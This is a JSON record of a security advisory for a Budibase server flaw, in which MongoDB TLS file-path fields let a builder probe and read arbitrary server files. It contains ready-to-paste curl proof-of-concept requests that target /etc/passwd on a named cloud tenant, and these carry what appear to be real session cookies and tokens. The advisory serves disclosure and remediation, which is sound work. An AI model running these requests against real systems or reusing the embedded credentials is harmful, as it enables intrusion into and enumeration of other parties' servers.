{"id":"GHSA-ppr4-5f46-j9c6","title":" Budibase: Server Filesystem Existence/Read Oracle via Builder-Controlled MongoDB tlsCertificateKeyFile","summary":" Budibase: Server Filesystem Existence/Read Oracle via Builder-Controlled MongoDB tlsCertificateKeyFile","severity":"high","cwe":["CWE-209"],"vendor":"budibase","product":"@budibase/server","ecosystem":"npm","affected":["@budibase/server <= 3.38.1"],"published":"2026-07-24","updated":"2026-07-24","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-ppr4-5f46-j9c6","references":[{"url":"https://github.com/Budibase/budibase/security/advisories/GHSA-ppr4-5f46-j9c6"},{"url":"https://github.com/Budibase/budibase/pull/19244"},{"url":"https://github.com/Budibase/budibase/commit/5e19b935536d6d1be1f47100e43c6fb30917826e"},{"url":"https://github.com/Budibase/budibase/releases/tag/3.40.0"},{"url":"https://github.com/advisories/GHSA-ppr4-5f46-j9c6"}],"tags":["ghsa","npm"],"ingestedAt":"2026-07-24T21:39:14.347Z","slug":"GHSA-ppr4-5f46-j9c6","body":"## Overview\n\n## Summary\nWhen creating a MongoDB datasource, Budibase passes the `tlsCertificateKeyFile` and `tlsCAFile` fields straight to the MongoDB driver as server-side file paths. On Budibase Cloud a customer cannot place files on the server, so these fields only let a builder reference arbitrary absolute paths on the underlying multi-tenant server. When the datasource is verified, the driver performs a real filesystem read of that path, and the error differs by file state, turning `/api/datasources/verify` into an arbitrary-path existence/read oracle over the whole server filesystem.\n\n## Root Cause\n`packages/server/src/integrations/mongodb.ts` passes `config.tlsCertificateKeyFile` / `config.tlsCAFile` directly to `new MongoClient(config.connectionString, options)` as filesystem paths, with no allow-list, no confinement to a certificates directory, and no rejection of absolute / `..` paths.\n\nPOC \n## Reproduction — paste each line, press Enter\n\nLine 1 (existing file — proves the file is READ):\n```\ncurl -s -X POST \"https://hasinocompany.budibase.app/api/datasources/verify\" -H \"Cookie: budibase:auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uSWQiOiJlNDYzZTM0Ni1hZmQ2LTQwNDEtODNmMS1hYmNlNzhjMmExN2QiLCJ1c2VySWQiOiJ1c19jMGY4NDE0NjAxYmQ0ZTk0YTJmMTEzMTAxYzVlNzZkNCIsImVtYWlsIjoiY3liZXJAaGFzaW5vc2VjLmxhdCIsImNzcmZUb2tlbiI6ImU5ZDJlZjQ4LTJiNmEtNDJhZC1hN2ViLTY1NzkzZDg3ZDdlYyIsInRlbmFudElkIjoiaGFzaW5vY29tcGFueSIsImlhdCI6MTc4NDAzNTU1NywiZXhwIjoxNzg0NjQwMzU3fQ.oaxPeSwQ571QDd7pPZZy-G0b4rpI6-wYQqcV2Urwlo8; budibase:auth.sig=exoCxnKfj6IDWg6z04bX4dUcPN0\" -H \"x-csrf-token: e9d2ef48-2b6a-42ad-a7eb-65793d87d7ec\" -H \"x-budibase-app-id: app_dev_hasinocompany_bcb6316e0d014f91939c812389012415\" -H \"Content-Type: application/json\" -d '{\"datasource\":{\"name\":\"probe\",\"source\":\"MONGODB\",\"type\":\"datasource\",\"config\":{\"connectionString\":\"mongodb://127.0.0.1:27017/?tls=true\",\"database\":\"x\",\"tlsCertificateKeyFile\":\"/etc/passwd\"}}}'\n```\n\nRESPONSE\n\n{\"connected\":false,\"error\":\"error:0480006C:PEM routines::no start line\"} \n\n\n\nLine 2 (missing file — path is reflected):\n```\ncurl -s -X POST \"https://hasinocompany.budibase.app/api/datasources/verify\" -H \"Cookie: budibase:auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uSWQiOiJlNDYzZTM0Ni1hZmQ2LTQwNDEtODNmMS1hYmNlNzhjMmExN2QiLCJ1c2VySWQiOiJ1c19jMGY4NDE0NjAxYmQ0ZTk0YTJmMTEzMTAxYzVlNzZkNCIsImVtYWlsIjoiY3liZXJAaGFzaW5vc2VjLmxhdCIsImNzcmZUb2tlbiI6ImU5ZDJlZjQ4LTJiNmEtNDJhZC1hN2ViLTY1NzkzZDg3ZDdlYyIsInRlbmFudElkIjoiaGFzaW5vY29tcGFueSIsImlhdCI6MTc4NDAzNTU1NywiZXhwIjoxNzg0NjQwMzU3fQ.oaxPeSwQ571QDd7pPZZy-G0b4rpI6-wYQqcV2Urwlo8; budibase:auth.sig=exoCxnKfj6IDWg6z04bX4dUcPN0\" -H \"x-csrf-token: e9d2ef48-2b6a-42ad-a7eb-65793d87d7ec\" -H \"x-budibase-app-id: app_dev_hasinocompany_bcb6316e0d014f91939c812389012415\" -H \"Content-Type: application/json\" -d '{\"datasource\":{\"name\":\"probe\",\"source\":\"MONGODB\",\"type\":\"datasource\",\"config\":{\"connectionString\":\"mongodb://127.0.0.1:27017/?tls=true\",\"database\":\"x\",\"tlsCertificateKeyFile\":\"/nonexistent/pentest/xyz\"}}}'\n```\n\nRESPONSE\n\n{\"connected\":false,\"error\":\"ENOENT: no such file or directory, open '/nonexistent/pentest/xyz'\"}\n\n\n### Actual output\n```text\n/etc/passwd               -> {\"connected\":false,\"error\":\"error:0480006C:PEM routines::no start line\"}          (EXISTS, was READ)\n/nonexistent/pentest/xyz  -> {\"connected\":false,\"error\":\"ENOENT: no such file or directory, open '/nonexistent/pentest/xyz'\"}   (MISSING, path reflected)\n```\nExisting files return a \"PEM routines\" error (the file was read but is not PEM); missing files return `ENOENT ... open '<path>'` with the path echoed back. This confirms a real filesystem read at the attacker-chosen absolute path. Confirmed 3/3 separate runs.\n\n\n\n## Impact\n| Who / what is affected | How |\n|---|---|\n| The underlying multi-tenant Cloud server | Arbitrary-path existence/read oracle from a builder account |\n| Server config / secret files, other tenants' paths | Located by enumerating paths (exists vs missing) |\n| PEM/certificate files on the server | Content exfiltratable via mutual-TLS to an attacker MongoDB server (mechanism) |\n\n## Recommended Fix\n1. On managed/Cloud, disallow `tlsCertificateKeyFile` / `tlsCAFile` as filesystem paths; accept PEM content and write it to a per-connection temp file under a fixed directory.\n2. Reject absolute and `..` paths; confine any file reference to an allow-listed certificates directory.\n3. Route the MongoDB connection host through the SSRF blacklist, as the REST integration already does.\n\n## Affected packages\n\n- `@budibase/server <= 3.38.1`\n\n## Remediation\n\nRefer to the advisory for the patched release.","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}